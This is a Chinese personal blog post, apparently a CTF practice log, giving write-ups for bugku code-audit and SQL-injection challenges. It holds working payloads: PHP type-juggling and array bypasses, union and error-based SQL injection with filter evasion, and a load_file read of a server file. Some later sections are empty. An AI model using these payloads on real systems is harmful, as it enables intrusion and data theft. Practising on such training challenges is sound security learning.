<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="前言 第一次周记">
<meta property="og:type" content="article">
<meta property="og:title" content="第一次周记">
<meta property="og:url" content="http://yoursite.com/2018/04/25/第一次周记/index.html">
<meta property="og:site_name" content="The7sins">
<meta property="og:description" content="前言 第一次周记">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/ctf/2.png">
<meta property="og:image" content="http://yoursite.com/ctf/3.png">
<meta property="og:image" content="http://yoursite.com/ctf/4.png">
<meta property="og:image" content="http://yoursite.com/ctf/5.png">
<meta property="og:image" content="http://yoursite.com/ctf/6.png">
<meta property="og:image" content="http://yoursite.com/ctf/7.png">
<meta property="og:image" content="http://yoursite.com/ctf/8.png">
<meta property="og:image" content="http://yoursite.com/ctf/9.png">
<meta property="og:image" content="http://yoursite.com/ctf/10.png">
<meta property="og:image" content="http://yoursite.com/ctf/11.png">
<meta property="og:image" content="http://yoursite.com/ctf/12.png">
<meta property="og:image" content="http://yoursite.com/ctf/13.png">
<meta property="og:image" content="http://yoursite.com/ctf/14.png">
<meta property="og:image" content="http://yoursite.com/ctf/15.png">
<meta property="og:updated_time" content="2018-05-02T14:47:43.252Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="第一次周记">
<meta name="twitter:description" content="前言 第一次周记">
<meta name="twitter:image" content="http://yoursite.com/ctf/2.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/04/25/第一次周记/"/>






  <script>
  (function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/0f81ff2f.js","daovoice")
  daovoice('init', {
      app_id: "61988f7d"
    });
  daovoice('update');
  </script>


  <title>第一次周记 | The7sins</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
	<a href="https://github.com/The7sins"  class="github-corner" aria-label="View source on Github"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">The7sins</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">来的人都是大佬</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/04/25/第一次周记/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="The7sins">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="The7sins">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">第一次周记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-04-25T19:34:38+08:00">
                2018-04-25
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><blockquote>
<p>第一次周记<br><a id="more"></a></p>
</blockquote>
<h2 id="2018-04-23————2018-04-24"><a href="#2018-04-23————2018-04-24" class="headerlink" title="2018-04-23————2018-04-24"></a>2018-04-23————2018-04-24</h2><blockquote>
<p>刷了bugku的代码审计的题目，下面写一下writeup</p>
</blockquote>
<h3 id="0x01-extract变量覆盖"><a href="#0x01-extract变量覆盖" class="headerlink" title="0x01 extract变量覆盖"></a>0x01 extract变量覆盖</h3><p>需要get的shiyan的值与flag的值相同，则可以让他们都等于空。extract()会将$flag的值覆盖，将shiyan变量的值设置为空,flag为不存在的文件时满足$shiyan == $content(都是空)即可bypass<br>payload：<code>？shiyan=&amp;flag=</code>  </p>
<h3 id="0x02-strcmp比较字符串"><a href="#0x02-strcmp比较字符串" class="headerlink" title="0x02 strcmp比较字符串"></a>0x02 strcmp比较字符串</h3><p>任意数组通过strcmp和任意字符串相比较的结果都是NULL（数组绕过)<br>payload：<code>?a[]</code></p>
<h3 id="0x03-urldecode二次编码绕过"><a href="#0x03-urldecode二次编码绕过" class="headerlink" title="0x03 urldecode二次编码绕过"></a>0x03 urldecode二次编码绕过</h3><p>所以payload中不能有hackerDJ，下边使用urldecode对id的值进行解码，所以可以让id得到的值是hackerDJ的url编码，由于浏览器会自行解码一次，所以编码两次就好(D编码一次是%44，编码两次是%2544)<br>payload<code>?id=hacker%2544J</code></p>
<h3 id="0x04-md5-函数"><a href="#0x04-md5-函数" class="headerlink" title="0x04 md5()函数"></a>0x04 md5()函数</h3><p>老套路，MD5函数漏洞payload<code>?username[]=1&amp;password[]=2</code></p>
<h3 id="0x05-数组返回NULL绕过"><a href="#0x05-数组返回NULL绕过" class="headerlink" title="0x05 数组返回NULL绕过"></a>0x05 数组返回NULL绕过</h3><p>首先是ereg这个正则匹配函数是处理字符串的。。。构造数组是返回null，然后的话null===false 不相等可以执行下面的else if语句。。。<br>strpos处理数组页数返回null,于是null!==false成立就得到了flag<br>payload: <code>?password[]=1</code></p>
<h3 id="0x06-弱类型整数大小比较绕过"><a href="#0x06-弱类型整数大小比较绕过" class="headerlink" title="0x06 弱类型整数大小比较绕过"></a>0x06 弱类型整数大小比较绕过</h3><p>绕过数字判断,在数字后面加%00 %0e %0a a都可以<br>payload：<code>?id=1337%00</code></p>
<h3 id="0x07-sha-函数比较绕过"><a href="#0x07-sha-函数比较绕过" class="headerlink" title="0x07 sha()函数比较绕过"></a>0x07 sha()函数比较绕过</h3><p>payload:<code>?name[]=1&amp;password[]=2</code></p>
<h3 id="0x08-md5加密相等绕过"><a href="#0x08-md5加密相等绕过" class="headerlink" title="0x08 md5加密相等绕过"></a>0x08 md5加密相等绕过</h3><p>弱类型相等<br>payload:<code>?a=240610708</code></p>
<h3 id="0x09-十六进制与数字比较"><a href="#0x09-十六进制与数字比较" class="headerlink" title="0x09 十六进制与数字比较"></a>0x09 十六进制与数字比较</h3><p>题中不允许输入数字，但要passowrd的值与number的值相等<br>payload：<code>?password=0xdeadc0de</code></p>
<h3 id="0x10-ereg正则-00截断"><a href="#0x10-ereg正则-00截断" class="headerlink" title="0x10 ereg正则%00截断"></a>0x10 ereg正则%00截断</h3><p>ereg读到%00的时候，就截止了,那么在字符串里面包括%00即可； 长度小于8但要大于9999999,就想到科学计数法<br>payload：<code>password=1e9%00*-*</code></p>
<h3 id="0x11-strpos数组绕过"><a href="#0x11-strpos数组绕过" class="headerlink" title="0x11 strpos数组绕过"></a>0x11 strpos数组绕过</h3><p>既要是纯数字,又要有’#biubiubiu’，strpos()找的是字符串,那么传一个数组给它,strpos()出错返回null,null!==false,所以符合要求. 所以输入nctf[]= 那为什么ereg()也能符合呢?因为ereg()在出错时返回的也是null,null!==false,所以符合要求<br>payload:<code>?ctf[]=1</code></p>
<h3 id="0x12-数字验证正则绕过"><a href="#0x12-数字验证正则绕过" class="headerlink" title="0x12 数字验证正则绕过"></a>0x12 数字验证正则绕过</h3><h2 id="2018-04-24————2018-05-03"><a href="#2018-04-24————2018-05-03" class="headerlink" title="2018-04-24————2018-05-03"></a>2018-04-24————2018-05-03</h2><blockquote>
<p>bugku上一些我觉得比较难的题目的writeup</p>
</blockquote>
<h3 id="多次"><a href="#多次" class="headerlink" title="多次"></a>多次</h3><p>首先测试单引号，出错<br><img src="/ctf/2.png" alt=""><br>之后发现存在过滤（可以在<code>id=1</code>后加上<code>&#39;^()^&#39;</code>括号中为0，and，union等是显示正常，1=1时出错，说明过滤了and，union等）<br><img src="/ctf/3.png" alt=""><br>然后检查字段数，构建payload为<code>id=1&#39; oorrder by 2 --+</code>(在上一步中发现了or被过滤了)<br><img src="/ctf/4.png" alt=""><br>然后查询数据库中的内容<br><code>-1&#39;ununionion selselectect 1,database() --+</code><br><img src="/ctf/5.png" alt=""><br><code>-1&#39;ununionion selselectect 1,table_name from  infoorrmation_schema.tables where table_schema=&#39;web1002-1&#39;</code><br><img src="/ctf/6.png" alt=""><br><code>-1&#39;ununionion seselectlect 1,column_name from infoorrmation_schema.columns where table_schema=&#39;web1002-1&#39; anandd table_name=&#39;flag1&#39; limit 0,1--+</code><br><img src="/ctf/7.png" alt=""><br><code>-1&#39;ununionion seselectlect 1,column_name from infoorrmation_schema.columns where table_schema=&#39;web1002-1&#39; anandd table_name=&#39;flag1&#39; limit 1,1--+</code><br><img src="/ctf/8.png" alt=""><br><code>-1&#39;ununionion seselectlect 1,flag1 from flag1--+</code><br><img src="/ctf/9.png" alt=""><br>发现并不是flag，于是查看address表的内容<br><code>-1&#39;ununionion seselectlect 1,address from flag1--+</code><br><img src="/ctf/10.png" alt=""><br>进入第二关，发现有错误回显，则利用报错注入，首先爆数据库名<br><code>id=1&#39; or (select count(*)b,concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)=(1,1)  %23</code><br>然后爆表名<br><code>id=1&#39;or (select count(*)b,concat((select table_name from information_schema.tables where table_schema=&#39;web1002-2&#39; limit 1,1),floor(rand(0)*2))as a from information_schema.tables group by a)=(1,1)%23</code><br><img src="" alt=""><br>发现是flag21这个表，然后再爆列<br><code>id=1&#39;or(select count(*)b,concat((select column_name from information_schema.columns where table_schema = &#39;web1002-2&#39; and table_name=&#39;flag2&#39; limit 0,1),floor(rand(0)*2))afrom information_schema.tables group by a)(1,1)%23</code>在此处出错</p>
<h3 id="sql注入2"><a href="#sql注入2" class="headerlink" title="sql注入2"></a>sql注入2</h3><p>扫描目录发现了.DS_Store文件泄露<br><img src="/ctf/11.png" alt=""><br>然后用脚本工具打开<br><img src="/ctf/12.png" alt=""><br>直接访问即可</p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p>可以看到这里过滤了很多字符，包括单双引号，空格，但由于mysql的特性，我们可以使用回车换行符还替代即%0a或%0d。<br>因为要进行报错注入，所以我们可以使用extractvalue()或者updatexml()进行报错，尝试一条报错语句：  </p>
<pre><code>
?id=1%0aand%0aextractvalue(1,concat(0x7e,(select%0a@@version),0x7e))     

?id=1%0aand%0aupdatexml(1,concat(0x7e,(select%0a@@version),0x7e),1)

</code></pre><p><img src="/ctf/13.png" alt=""><br>再查询文件内容(根据提示要将文件路径进行16进制编码)，然后进行文件读取操作<code>?id=1%0Aand%0a(extractvalue(1,concat(0x7e,(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))),0x7e)))</code><br><img src="/ctf/14.png" alt=""><br>由于extractvalue函数只能读取32位，用substr函数来分段读取内容，然后再进行解码<code>?id=1%0aand%0a(extractvalue(1,concat(0x7e,substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870)),1,30),0x7e)))</code><br><img src="/ctf/15.png" alt=""></p>
<h3 id="phpcms"><a href="#phpcms" class="headerlink" title="phpcms"></a>phpcms</h3><h3 id="cms1"><a href="#cms1" class="headerlink" title="cms1"></a>cms1</h3>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/03/31/菜鸡对sql注入的一些简单总结/" rel="next" title="菜鸡对sql注入的一些简单总结">
                <i class="fa fa-chevron-left"></i> 菜鸡对sql注入的一些简单总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">The7sins</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2018-04-23————2018-04-24"><span class="nav-number">1.1.</span> <span class="nav-text">2018-04-23————2018-04-24</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-extract变量覆盖"><span class="nav-number">1.1.1.</span> <span class="nav-text">0x01 extract变量覆盖</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-strcmp比较字符串"><span class="nav-number">1.1.2.</span> <span class="nav-text">0x02 strcmp比较字符串</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-urldecode二次编码绕过"><span class="nav-number">1.1.3.</span> <span class="nav-text">0x03 urldecode二次编码绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-md5-函数"><span class="nav-number">1.1.4.</span> <span class="nav-text">0x04 md5()函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-数组返回NULL绕过"><span class="nav-number">1.1.5.</span> <span class="nav-text">0x05 数组返回NULL绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x06-弱类型整数大小比较绕过"><span class="nav-number">1.1.6.</span> <span class="nav-text">0x06 弱类型整数大小比较绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x07-sha-函数比较绕过"><span class="nav-number">1.1.7.</span> <span class="nav-text">0x07 sha()函数比较绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x08-md5加密相等绕过"><span class="nav-number">1.1.8.</span> <span class="nav-text">0x08 md5加密相等绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x09-十六进制与数字比较"><span class="nav-number">1.1.9.</span> <span class="nav-text">0x09 十六进制与数字比较</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x10-ereg正则-00截断"><span class="nav-number">1.1.10.</span> <span class="nav-text">0x10 ereg正则%00截断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x11-strpos数组绕过"><span class="nav-number">1.1.11.</span> <span class="nav-text">0x11 strpos数组绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x12-数字验证正则绕过"><span class="nav-number">1.1.12.</span> <span class="nav-text">0x12 数字验证正则绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2018-04-24————2018-05-03"><span class="nav-number">1.2.</span> <span class="nav-text">2018-04-24————2018-05-03</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#多次"><span class="nav-number">1.2.1.</span> <span class="nav-text">多次</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql注入2"><span class="nav-number">1.2.2.</span> <span class="nav-text">sql注入2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#报错注入"><span class="nav-number">1.2.3.</span> <span class="nav-text">报错注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#phpcms"><span class="nav-number">1.2.4.</span> <span class="nav-text">phpcms</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cms1"><span class="nav-number">1.2.5.</span> <span class="nav-text">cms1</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">The7sins</span>

  
</div>

<!--
<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>


-->

        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

  
   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/src/fireworks.js"></script>

</body>
</html>
